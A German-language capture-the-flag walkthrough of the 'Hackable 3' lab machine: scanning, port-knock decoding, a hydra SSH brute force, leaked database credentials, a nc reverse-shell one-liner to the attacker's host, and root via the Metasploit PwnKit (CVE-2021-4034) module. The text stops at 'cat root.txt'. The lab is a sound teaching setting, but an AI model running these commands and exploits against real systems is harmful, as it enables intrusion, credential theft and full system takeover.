Verwendete Tools
arp-scan
vi
nmap
gobuster
curl
stegseek
base64
wget
knock
hydra
ssh
msfconsole
rm
mkfifo
nc
Inhaltsverzeichnis
Reconnaissance
┌──(root㉿cyber)-[/home/cyber/Downloads]
└─# arp-scan -l
└─# arp-scan -l
192.168.2.138 08:00:27:e7:a0:89 PCS Systemtechnik GmbH
Wir verwenden ARP-Scan, um die IP-Adresse und MAC-Adresse des Zielsystems zu ermitteln.
Dies hilft uns, das Zielsystem im Netzwerk zu identifizieren.
┌──(root㉿cyber)-[~]
└─# vi /etc/hosts
└─# vi /etc/hosts
192.168.2.138 hackable.vuln
Wir fügen die IP-Adresse und den Hostnamen des Zielsystems zur /etc/hosts-Datei hinzu.
Dies ermöglicht uns, das Zielsystem über den Hostnamen anzusprechen.
┌──(root㉿cyber)-[~]
└─# nmap -sS -sC -T5 -AO 192.168.2.138 -p-
└─# nmap -sS -sC -T5 -AO 192.168.2.138 -p-
Starting Nmap 7.93 (https://nmap.org) at 2023-06-14 23:56 CEST Nmap scan report for hackable.vuln (192.168.2.138) Host is up (0.00013s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp filtered ssh 80/tcp open http Apache httpd 2.4.46 ((Ubuntu)) | http-robots.txt: 1 disallowed entry |_/config |_http-title: Kryptos - LAN Home |_http-server-header: Apache/2.4.46 (Ubuntu) MAC Address: 08:00:27:E7:A0:89 (Oracle VirtualBox virtual NIC) Aggressive OS guesses: Linux 5.0 - 5.3 (99%), Linux 2.6.32 (96%), Linux 3.2 - 4.9 (96%), Netgear ReadyNAS 2100 (RAIDiator 4.2.24) (96%), Linux 2.6.32 - 3.10 (96%), Linux 4.15 - 5.6 (96%), Linux 5.3 - 5.4 (96%), Sony X75CH-series Android TV (Android 5.0) (95%), Linux 3.1 (95%) No exact OS matches for host (test conditions non-ideal). Network Distance: 1 hop TRACEROUTE HOP RTT ADDRESS 1 0.13 ms hackable.vuln (192.168.2.138)
Wir führen einen umfassenden Nmap-Scan durch.
Wir stellen fest, dass Port 22 gefiltert ist und Port 80 offen ist.
Das robots.txt verbietet den Zugriff auf "/config".
┌──(root㉿cyber)-[~]
└─# nmap -sS -sC -T5 -AO 192.168.2.138 -p- | grep open
└─# nmap -sS -sC -T5 -AO 192.168.2.138 -p- | grep open
80/tcp open http Apache httpd 2.4.46 ((Ubuntu))
Wir bestätigen, dass nur Port 80 offen ist.
---------------------------------------------------------------------------
http://hackable.vuln/robots.txt
User-Agente: *
Disallow: /config
Disallow: /config
Wir lesen den Inhalt der Datei robots.txt, um zu sehen, welche Verzeichnisse ausgeschlossen sind.
┌──(root㉿cyber)-[~]
└─# gobuster dir -u http://192.168.2.138 -x txt,php,rar,zip,tar,pub,xls,docx,doc,sql,db,mdb,asp,aspx,accdb,bat,ps1,exe,sh,py,pl,gz,jpeg,jpg,png,html,phtml,xml,csv,dll,pdf,raw,rtf,xlsx,zip,kdbx,bak -w "/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt" -b '403,404' -e --no-error
└─# gobuster dir -u http://192.168.2.138 -x txt,php,rar,zip,tar,pub,xls,docx,doc,sql,db,mdb,asp,aspx,accdb,bat,ps1,exe,sh,py,pl,gz,jpeg,jpg,png,html,phtml,xml,csv,dll,pdf,raw,rtf,xlsx,zip,kdbx,bak -w "/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt" -b '403,404' -e --no-error
============================================================================================================================== http://192.168.2.138/index.html (Status: 200) [Size: 1095] http://192.168.2.138/home.html (Status: 200) [Size: 11327] http://192.168.2.138/login.php (Status: 200) [Size: 487] http://192.168.2.138/3.jpg (Status: 200) [Size: 61259] http://192.168.2.138/css/ (Status: 301) [Size: 312] [--> http://192.168.2.138/css/] http://192.168.2.138/js/ (Status: 301) [Size: 311] [--> http://192.168.2.138/js/] http://192.168.2.138/config/ (Status: 301) [Size: 315] [--> http://192.168.2.138/config/] http://192.168.2.138/config.php (Status: 200) [Size: 507] http://192.168.2.138/backup/ (Status: 301) [Size: 315] [--> http://192.168.2.138/backup/] http://192.168.2.138/robots.txt (Status: 200) [Size: 33] http://hackable.vuln/imagens (Status: 301) [Size: 316] [--> http://hackable.vuln/imagens/] http://hackable.vuln/login_page (Status: 301) [Size: 319] [--> http://hackable.vuln/login_page/]
Wir verwenden Gobuster, um nach Dateien und Verzeichnissen zu suchen.
Wir finden "index.html", "home.html", "login.php", "3.jpg", "css", "js", "config", "config.php", "backup" und "robots.txt".
Index of /configName Last modified Size Description
Parent Directory -
1.txt 2021-04-21 18:00 9
Wir greifen auf das Verzeichnis "/config" zu und finden die Datei "1.txt".
---------------------------------------------------------------------------
http://hackable.vuln/config/1.txt
http://hackable.vuln/config/1.txt
MTAwMDA=
Wir lesen den Inhalt der Datei "1.txt" und finden eine Base64-kodierte Zeichenkette.
┌──(root㉿cyber)-[~]
└─# curl -s http://hackable.vuln/config/1.txt | base64 -d
└─# curl -s http://hackable.vuln/config/1.txt | base64 -d
10000
Wir dekodieren die Base64-Zeichenkette und erhalten den Wert "10000".
┌──(root㉿cyber)-[~]
└─# stegseek 3.jpg /usr/share/wordlists/rockyou.txt
└─# stegseek 3.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek [i] Found passphrase: "" [i] Original filename: "steganopayload148505.txt". [i] Extracting to "3.jpg.out".
Wir versuchen, mit Stegseek versteckte Informationen aus der Datei "3.jpg" zu extrahieren.
Wir verwenden die "rockyou.txt"-Wortliste als Passwortliste.
┌──(root㉿cyber)-[~]
└─# cat 3.jpg.out
└─# cat 3.jpg.out
porta:65535
Stegseek findet das Passwort "porta:65535".
┌──(root㉿cyber)-[~]
└─# wget http://hackable.vuln/backup/wordlist.txt -O passlist.txt
└─# wget http://hackable.vuln/backup/wordlist.txt -O passlist.txt
--2023-06-15 00:04:42-- http://hackable.vuln/backup/wordlist.txt Auflösen des Hostnamens hackable.vuln (hackable.vuln)… 192.168.2.138 Verbindungsaufbau zu hackable.vuln (hackable.vuln)|192.168.2.138|:80 … verbunden. HTTP-Anforderung gesendet, auf Antwort wird gewartet … 200 OK Länge: 2335 (2,3K) [text/plain] Wird in »passlist.txt« gespeichert. passlist.txt 100%[=======================================>] 2,28K --.-KB/s in 0s 2023-06-15 00:04:42 (701 MB/s) - »passlist.txt« gespeichert [2335/2335]
Wir laden die Passwortliste "wordlist.txt" herunter und speichern sie als "passlist.txt".
┌──(root㉿cyber)-[~]
└─# knock hackable.vuln 10000 290 65535
└─# knock hackable.vuln 10000 290 65535
Wir führen einen Port Knocking aus.
┌──(root㉿cyber)-[~]
└─# nmap -sS -sC -T5 -AO 192.168.2.138 -p- | grep open
└─# nmap -sS -sC -T5 -AO 192.168.2.138 -p- | grep open
80/tcp open http Apache httpd 2.4.46 ((Ubuntu))
Wir führen erneut einen Nmap-Scan durch und stellen fest, dass Port 22 immer noch gefiltert ist.
10000 290 65535
---------------------------------------------------------------------------
view-source:http://hackable.vuln/login.php
view-source:http://hackable.vuln/login.php
include('config.php');
$usuario = $_POST['user'];
$senha = $_POST['pass'];
$query = " SELECT * FROM usuarios WHERE user = '{$usuario}' and pass = '{$senha}'";
$result = mysqli_query($conexao, $query);
$row = mysqli_num_rows($result);
#valida conta
if($row == 1) {
$_SESSION['usuario'] = $usuario;
header('Location: 3.jpg');
exit();
} else {
$_SESSION['nao_autenticado'] = true;
header('Location: login_page/login.html');
exit();
}
Wir analysieren den Quellcode der Datei "login.php".
Wir stellen fest, dass der Benutzername und das Passwort direkt in einer SQL-Abfrage verwendet werden, was anfällig für SQL-Injection ist.
---------------------------------------------------------------------------
view-source:http://hackable.vuln/config.php
view-source:http://hackable.vuln/config.php
/* Database credentials. Assuming you are running MySQL
server with default setting (user 'root' with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', '');
define('DB_NAME', 'hackable');
/* Attempt to connect to MySQL database */
$conexao = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);
// Check connection
if($conexao === false){
die("ERROR: Could not connect. " . mysqli_connect_error());
} else {
}
Wir analysieren den Quellcode der Datei "config.php" und finden die Datenbankanmeldeinformationen:
Benutzername: root, Passwort: (leer), Datenbankname: hackable.
---------------------------------------------------------------------------
http://hackable.vuln/css/2.txt
http://hackable.vuln/css/2.txt
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>------------------....
Wir greifen auf die Datei "/css/2.txt" zu und finden Brainfuck-Code.
4444
Wir verwenden den Brainfuck-Interpreter, um den Code zu dekodieren. Wir erhalten den Wert "4444".
┌──(root㉿cyber)-[~]
└─# knock hackable.vuln 10000 4444 65535
└─# knock hackable.vuln 10000 4444 65535
Wir führen einen Port Knocking mit den neuen Ports aus.
┌──(root㉿cyber)-[~]
└─# nmap -sS -sC -T5 -AO 192.168.2.138 -p- | grep open
└─# nmap -sS -sC -T5 -AO 192.168.2.138 -p- | grep open
22/tcp open ssh OpenSSH 8.4p1 Ubuntu 5ubuntu1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.46 ((Ubuntu))
80/tcp open http Apache httpd 2.4.46 ((Ubuntu))
Wir führen erneut einen Nmap-Scan durch und stellen fest, dass Port 22 jetzt offen ist.
---------------------------------------------------------------------------
http://hackable.vuln/
http://hackable.vuln/
Please, jubiscleudo, don't forget to activate the port knocking when exiting your
section, and tell the boss not to forget to approve the .jpg file - dev_suport@hackable3.com"
section, and tell the boss not to forget to approve the .jpg file - dev_suport@hackable3.com"
Wir analysieren den Quellcode der Webseite und finden einen Hinweis auf den Benutzernamen "jubiscleudo".
┌──(root㉿cyber)-[~]
└─# hydra -l jubiscleudo -P passlist.txt ssh://192.168.2.138:22 -t 64
└─# hydra -l jubiscleudo -P passlist.txt ssh://192.168.2.138:22 -t 64
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-06-15 00:30:17 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 64 tasks per 1 server, overall 64 tasks, 300 login tries (l:1/p:300), ~5 tries per task [DATA] attacking ssh://192.168.2.138:22/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [22][ssh] host: 192.168.2.138 login: jubiscleudo password: onlymy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 17 final worker threads did not complete until end. [ERROR] 17 targets did not resolve or could not be connected [ERROR] 0 target did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-06-15 00:30:38
Wir verwenden Hydra, um einen Brute-Force-Angriff auf den SSH-Server mit dem Benutzernamen "jubiscleudo" und der Passwortliste "passlist.txt" durchzuführen.
Wir finden das Passwort onlymy.
┌──(root㉿cyber)-[~]
└─# ssh -l jubiscleudo hackable.vuln
└─# ssh -l jubiscleudo hackable.vuln
The authenticity of host 'hackable.vuln (192.168.2.138)' can't be established.
ED25519 key fingerprint is SHA256:eKPnFiq8KwR3xWNP5ZL/aPJYYx+GZaCVrzrHIL4rem4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'hackable.vuln' (ED25519) to the list of known hosts.
jubiscleudo@hackable.vuln's password:
ED25519 key fingerprint is SHA256:eKPnFiq8KwR3xWNP5ZL/aPJYYx+GZaCVrzrHIL4rem4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'hackable.vuln' (ED25519) to the list of known hosts.
jubiscleudo@hackable.vuln's password:
onlymy
Welcome to Ubuntu 21.04 (GNU/Linux 5.11.0-16-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Wed Jun 14 10:31:32 PM UTC 2023 System load: 0.09 Memory usage: 43% Processes: 110 Usage of /: 23.7% of 23.99GB Swap usage: 0% Users logged in: 0 => There were exceptions while processing one or more plugins. See /var/log/landscape/sysinfo.log for more information. * Pure upstream Kubernetes 1.21, smallest, simplest cluster ops! https://microk8s.io/ 0 updates can be installed immediately. 0 of these updates are security updates. The list of available updates is more than a week old. To check for new updates run: sudo apt update Your Ubuntu release is not supported anymore. For upgrade information, please visit: http://www.ubuntu.com/releaseendoflife New release '22.04.2 LTS' available. Run 'do-release-upgrade' to upgrade to it. Last login: Thu Apr 29 16:19:07 2021 from 192.168.2.106 jubiscleudo@ubuntu20:~$
Wir verbinden uns über SSH mit dem Benutzernamen "jubiscleudo" und dem Passwort "onlymy" mit dem Zielsystem.
Wir haben erfolgreich initialen Zugriff auf das System erlangt.
Privilege Escalation
jubiscleudo@ubuntu20:~$ sudo -l
[sudo] password for jubiscleudo:
Sorry, user jubiscleudo may not run sudo on ubuntu20.
Sorry, user jubiscleudo may not run sudo on ubuntu20.
Wir versuchen, sudo auszuführen, aber der Benutzer "jubiscleudo" hat keine sudo-Rechte.
jubiscleudo@ubuntu20:~$ ls -la
total 32 drwxr-x--- 3 jubiscleudo jubiscleudo 4096 Apr 29 2021 . drwxr-xr-x 4 root root 4096 Apr 29 2021 .. -rw------- 1 jubiscleudo jubiscleudo 5 Apr 29 2021 .bash_history -rw-r--r-- 1 jubiscleudo jubiscleudo 220 Apr 29 2021 .bash_logout -rw-r--r-- 1 jubiscleudo jubiscleudo 3771 Apr 29 2021 .bashrc drwx------ 2 jubiscleudo jubiscleudo 4096 Apr 29 2021 .cache -rw-r--r-- 1 jubiscleudo jubiscleudo 807 Apr 29 2021 .profile -rw-r--r-- 1 jubiscleudo jubiscleudo 2984 Apr 27 2021 .user.txt
Wir listen den Inhalt des Home-Verzeichnisses auf.
Wir finden die Datei ".user.txt".
jubiscleudo@ubuntu20:~$ cat .user.txt
% ,%&&%#. % *&&&%&&%&&&&% % &&&& .%&&& % &&&# %&&& % /&&& &&&. % %&%/ %&&&* % .& (%%(, ,(&&&* %&& % &&% %&&&&&&&&&&%&%# &&& % &&&%&&&&&& #&&&%&&&* &&&%&&&% % &&&%&&&%&&&%&& /&&&%&&&%&&&%&& % &&&%&&&% &&&%&&&% % %&&&%&&& /&&&%&&&%& % &.%&&&% %&&&% &&&%& %&/*& % &&&%&&&%&& %&&&%# %%&&&% %&&&%&&&%& % /&%&/ *&&&%&& %&&&%&&%& &&&%&&. %&&&. % &&&% &&&%& %%%% .&&& % &&&% &&& % %&&&. *&%&&&%&&&%&&&%&&&%&&&%&&&%&&&&%&& /&&&( % /&& #&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&* %&& % &&&% ,&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&& %&% % &&& %&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&& %&& % &&& &&&%&&&%&&&%&&&%&%& %&&&%&&&%&&&%& &&& % %&&&% &&&%&&&%&&&%&&&%& &&&%&&&%&&&%&% &%&# % &&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&& % &%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&% % &&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&& % *&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&&& % &&&%&&&%&&&%&&&%&&&%&&&%&&&%&&&%&& % #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%( invite-me: https://www.linkedin.com/in/eliastouguinho/
Wir geben den Inhalt der Datei ".user.txt" aus.
Wir finden ein ASCII-Art-Bild und einen Link zu einem LinkedIn-Profil.
jubiscleudo@ubuntu20:~$ cat .bash_history
exit
Wir geben die Bash-Historie aus. Die Historie ist leer.
jubiscleudo@ubuntu20:~$ find / -type f -perm -4000 -ls 2>/dev/null
918199 88 -rwsr-xr-x 1 root root 88496 Jan 7 2021 /usr/bin/gpasswd
918181 40 -rwsr-xr-x 1 root root 39144 Mar 23 2021 /usr/bin/fusermount
918068 84 -rwsr-xr-x 1 root root 85064 Jan 7 2021 /usr/bin/chfn
918345 44 -rwsr-xr-x 1 root root 44784 Jan 7 2021 /usr/bin/newgrp
918074 52 -rwsr-xr-x 1 root root 53040 Jan 7 2021 /usr/bin/chsh
918677 40 -rwsr-xr-x 1 root root 39296 Feb 26 2021 /usr/bin/umount
918606 72 -rwsr-xr-x 1 root root 72072 Feb 26 2021 /usr/bin/su
918399 32 -rwsr-xr-x 1 root root 31032 Feb 4 2021 /usr/bin/pkexec
918331 56 -rwsr-xr-x 1 root root 55680 Feb 26 2021 /usr/bin/mount
918378 72 -rwsr-xr-x 1 root root 72304 Jan 7 2021 /usr/bin/passwd
918607 188 -rwsr-xr-x 1 root root 190952 Feb 18 2021 /usr/bin/sudo
923773 124 -rwsr-xr-x 1 root root 126024 Mar 30 2021 /usr/lib/snapd/snap-confine
919103 296 -rwsr-xr-x 1 root root 301512 Mar 23 2021 /usr/lib/openssh/ssh-keysign
918896 52 -rwsr-xr-- 1 root messagebus 51496 Feb 26 2021 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
924416 24 -rwsr-xr-x 1 root root 22840 Feb 4 2021 /usr/libexec/polkit-agent-helper-1
798 84 -rwsr-xr-x 1 root root 85064 May 28 2020 /snap/core20/1026/usr/bin/chfn
804 52 -rwsr-xr-x 1 root root 53040 May 28 2020 /snap/core20/1026/usr/bin/chsh
873 87 -rwsr-xr-x 1 root root 88464 May 28 2020 /snap/core20/1026/usr/bin/gpasswd
957 55 -rwsr-xr-x 1 root root 55528 Jul 21 2020 /snap/core20/1026/usr/bin/mount
966 44 -rwsr-xr-x 1 root root 44784 May 28 2020 /snap/core20/1026/usr/bin/newgrp
979 67 -rwsr-xr-x 1 root root 68208 May 28 2020 /snap/core20/1026/usr/bin/passwd
1088 67 -rwsr-xr-x 1 root root 67816 Jul 21 2020 /snap/core20/1026/usr/bin/su
1089 163 -rwsr-xr-x 1 root root 166056 Jan 19 2021 /snap/core20/1026/usr/bin/sudo
1147 39 -rwsr-xr-x 1 root root 39144 Jul 21 2020 /snap/core20/1026/usr/bin/umount
Wir suchen nach SUID-Dateien.
jubiscleudo@ubuntu20:~$ ls -la /etc/passwd
-rw-r--r-- 1 root root 1891 Apr 29 2021 /etc/passwd
Wir überprüfen die Berechtigungen der Datei /etc/passwd.
jubiscleudo@ubuntu20:~$ getcap -r / 2>/dev/null
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/traceroute6.iputils cap_net_raw=ep
/usr/bin/ping cap_net_raw=ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
/snap/core20/1026/usr/bin/ping cap_net_raw=ep
/usr/bin/traceroute6.iputils cap_net_raw=ep
/usr/bin/ping cap_net_raw=ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
/snap/core20/1026/usr/bin/ping cap_net_raw=ep
Wir suchen nach Dateien mit gesetzten Capabilities.
jubiscleudo@ubuntu20:~$ ls -la ..
total 16
drwxr-xr-x 4 root root 4096 Apr 29 2021 .
drwxr-xr-x 21 root root 4096 Apr 29 2021 ..
drwxr-x--- 3 hackable_3 hackable_3 4096 Apr 29 2021 hackable_3
drwxr-x--- 3 jubiscleudo jubiscleudo 4096 Apr 29 2021 jubiscleudo
drwxr-xr-x 4 root root 4096 Apr 29 2021 .
drwxr-xr-x 21 root root 4096 Apr 29 2021 ..
drwxr-x--- 3 hackable_3 hackable_3 4096 Apr 29 2021 hackable_3
drwxr-x--- 3 jubiscleudo jubiscleudo 4096 Apr 29 2021 jubiscleudo
Wir listen den Inhalt des übergeordneten Verzeichnisses auf.
jubiscleudo@ubuntu20:~$ ls -la /var/www/html/
total 124 drwxr-xr-x 8 root root 4096 Jun 30 2021 . drwxr-xr-x 3 root root 4096 Apr 29 2021 .. -rw-r--r-- 1 www-data www-data 61259 Apr 21 2021 3.jpg drwxr-xr-x 2 www-data www-data 4096 Apr 23 2021 backup -r-xr-xr-x 1 www-data www-data 522 Apr 29 2021 .backup_config.php drwxr-xr-x 2 www-data www-data 4096 Apr 29 2021 config -rw-r--r-- 1 www-data www-data 507 Apr 23 2021 config.php drwxr-xr-x 2 www-data www-data 4096 Apr 21 2021 css -rw-r--r-- 1 www-data www-data 11327 Jun 30 2021 home.html drwxr-xr-x 2 www-data www-data 4096 Apr 21 2021 imagens -rw-r--r-- 1 www-data www-data 1095 Jun 30 2021 index.html drwxr-xr-x 2 www-data www-data 4096 Apr 20 2021 js drwxr-xr-x 5 www-data www-data 4096 Jun 30 2021 login_page -rw-r--r-- 1 www-data www-data 487 Apr 23 2021 login.php -rw-r--r-- 1 www-data www-data 33 Apr 21 2021 robots.txt
Wir listen den Inhalt des Web-Root-Verzeichnisses auf.
jubiscleudo@ubuntu20:~$ ss -atlpn
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:* LISTEN 0 128 0.0.0.0:22 0.0.0.0:* LISTEN 0 511 *:80 *:* LISTEN 0 128 [::]:22 [::]:*
Wir verwenden ss, um die Netzwerkverbindungen aufzulisten.
jubiscleudo@ubuntu20:~$ uname -a
Linux ubuntu20 5.11.0-16-generic #17-Ubuntu SMP Wed Apr 14 20:12:43 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
Wir geben die Kernel-Informationen aus.
jubiscleudo@ubuntu20:/var/www/html$ cat .backup_config.php
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'hackable_3');
define('DB_PASSWORD', 'TrOLLED_3');
define('DB_NAME', 'hackable');
Wir lesen die Datei ".backup_config.php" und finden die Datenbankanmeldeinformationen.
jubiscleudo@ubuntu20:/var/www/html$ su hackable_3
Password:
TrOLLED_3
hackable_3@ubuntu20:/var/www/html$
hackable_3@ubuntu20:/var/www/html$ sudo -l
[sudo] password for hackable_3:
Sorry, user hackable_3 may not run sudo on ubuntu20.
Sorry, user hackable_3 may not run sudo on ubuntu20.
Wir versuchen mit "su" zum Benutzer "hackable_3" zu wechseln und prüfen die sudo-Rechte.
Wir haben keine Sudo-rechte.
┌──(root㉿cyber)-[~]
└─# msfconsole
└─# msfconsole
_---------.
.' ####### ;."
.---,. ;@ @@`; .---,..
." @@@@@'.,'@@ @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
`.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
"--'.@@@ -.@ @ ,'- .'--"
".@' ; @ @ `. ;'
|@@@@ @@@ @ .
' @@@ @@ @@ ,
`.@@@@ @@ .
',@@ @ ; _____________
( 3 C ) /|\___ / Metasploit! \
;@'. __*__,." \|--- \_____________/
'(.,...."/
=[ metasploit v6.3.16-dev ]
+ -- --=[ 2315 exploits - 1208 auxiliary - 412 post ]
+ -- --=[ 975 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Tired of setting RHOSTS for modules? Try
globally setting it with setg RHOSTS x.x.x.x
Metasploit Documentation: https://docs.metasploit.com/
Wir starten Metasploit.
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost eth0
lhost => eth0
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.2.137:4444 [*] Command shell session 1 opened (192.168.2.137:4444 -> 192.168.2.138:39880) at 2023-06-15 00:44:09 +0200
Shell Banner:
$
-----
$
$
-----
$
Wir starten einen Handler, um eine Reverse-Shell zu empfangen.
----------------------
hackable_3@ubuntu20:/tmp$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.2.137 4444 >/tmp/f
----------------------
msf6 exploit(multi/handler) > search shell to meterpreter
use 58
msf6 post(multi/manage/shell_to_meterpreter) > set session 1
session => 1
msf6 post(multi/manage/shell_to_meterpreter) > set lhost eth0
lhost => 192.168.2.137
lhost => 192.168.2.137
msf6 post(multi/manage/shell_to_meterpreter) > options
Module options (post/multi/manage/shell_to_meterpreter):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER true yes Start an exploit/multi/handler to receive the connect
ion
LHOST 192.168.2.137 no IP of host that will receive the connection from the
payload (Will try to auto detect).
LPORT 4433 yes Port for payload to connect to.
SESSION 1 yes The session to run this module on
View the full module info with the info, or info -d command.
msf6 post(multi/manage/shell_to_meterpreter) > set lport 4433
lport => 4433
msf6 post(multi/manage/shell_to_meterpreter) > set handler true
handler => true
msf6 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 1 [*] Starting exploit/multi/handler [*] Started reverse TCP handler on 192.168.2.137:4433 [*] Sending stage (1017704 bytes) to 192.168.2.138 [*] Meterpreter session 2 opened (192.168.2.137:4433 -> 192.168.2.138:47120) at 2023-06-15 00:47:42 +0200 [*] Command stager progress: 100.00% (773/773 bytes) [*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > search suggester
Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
msf6 post(multi/manage/shell_to_meterpreter) > use 0
msf6 post(multi/recon/local_exploit_suggester) > options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the avail
able exploits
View the full module info with the info, or info -d command.
msf6 post(multi/recon/local_exploit_suggester) > set session 2
session => 2
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 192.168.2.138 - Collecting local exploits for x86/linux... [*] 192.168.2.138 - 184 exploit checks are being tried... [+] 192.168.2.138 - exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe: The target appears to be vulnerable. [+] 192.168.2.138 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable. [+] 192.168.2.138 - exploit/linux/local/cve_2022_0847_dirtypipe: The target appears to be vulnerable. Linux kernel version found: 5.11.0 [+] 192.168.2.138 - exploit/linux/local/netfilter_priv_esc_ipv4: The target appears to be vulnerable.
Wir verwenden den local_exploit_suggester, um potenzielle Exploits für Privilege Escalation zu finden.
Wir finden vier potenzielle Exploits.
Privilege Escalation
cve_2021_4034_pwnkit_lpe_pkexec
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > options
Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec):
Name Current Setting Required Description
---- --------------- -------- -----------
PKEXEC_PATH no The path to pkexec binary
SESSION yes The session to run this module on
WRITABLE_DIR /tmp yes A directory where we can write files
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.2.137 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 x86_64
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set lhost eth0
lhost => 192.168.2.137
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set lport 5858
lport => 5858
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set WRITABLE_DIR /tmp
WRITABLE_DIR => /tmp
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set session 2
session => 2
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run
[*] Started reverse TCP handler on 192.168.2.137:5858
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.krkfoiadvrn
[+] The target is vulnerable.
[*] Writing '/tmp/.hldqgjuowbu/fkshdw/fkshdw.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.hldqgjuowbu
[*] Sending stage (3045348 bytes) to 192.168.2.138
[+] Deleted /tmp/.hldqgjuowbu/fkshdw/fkshdw.so
[+] Deleted /tmp/.hldqgjuowbu/.vfxobui
[+] Deleted /tmp/.hldqgjuowbu
[*] Meterpreter session 3 opened (192.168.2.137:5858 -> 192.168.2.138:35000) at 2023-06-15 00:52:03 +0200
cve_2021_4034_pwnkit_lpe_pkexec --> R00t
meterpreter > shell
Process 2389 created.
Channel 1 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd),1000(hackable_3)
Wir verwenden den Exploit "cve_2021_4034_pwnkit_lpe_pkexec", um Root-Rechte zu erlangen. Fantastisch, der Root-Zugriff war erfolgreich! Nun haben wir unser Ziel erreicht!
pwd
/
cd /root
ls
knockrestart.sh
root.txt
snap
root.txt
snap
cat root.txt
